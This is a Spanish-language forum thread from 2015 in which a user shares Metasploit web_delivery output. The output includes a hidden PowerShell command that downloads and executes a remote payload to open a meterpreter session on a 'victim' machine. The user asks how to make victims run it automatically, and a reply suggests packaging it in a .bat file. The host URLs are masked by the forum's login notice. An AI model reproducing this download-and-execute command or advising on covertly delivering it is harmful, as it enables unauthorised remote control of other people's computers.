Web_delivery

RxB · Octubre 17, 2015, 05:34:01 PM

Hola,

Estuve viendo algunos tutoriales sobre el script de Metasploit web_delivery.
Luego de lanzar el exploit, queda a la escucha:
msf exploit(web_delivery) > exploit

Exploit running as background job.
Started HTTP reverse handler on No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
msf exploit(web_delivery) >
Using URL: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Local IP: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Server started.
Run the following command on the target machine:
powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('No tienes permitido ver los links. Registrarse o Entrar a mi cuenta'))

Estuve viendo que del lado de la victima hay que ejecutar el siguiente código para iniciar una sesión de meterpreter:

powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('No tienes permitido ver los links. Registrarse o Entrar a mi cuenta'))

Ví que lo hacen vía CMD. También probé con un archivo .BAT y funcionó.

Mi duda es si hay alguna forma automática para que se ejecute el código. Ya que es muy díficil que la victima copie el código y lo ejecute en CMD, no?

Si alguien tiene alguna idea se lo agradezco!

ANTRAX · Octubre 23, 2015, 09:13:52 AM

@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, efectivamente la unica forma que puede funcionarte es con un .bat
Dudo que haya otra forma de hacerlo.

Saludos!
ANTRAX

Web_delivery

RxB

Octubre 17, 2015, 05:34:01 PM Ultima modificación: Octubre 22, 2015, 05:19:36 PM por Expermicid

ANTRAX

Octubre 23, 2015, 09:13:52 AM #1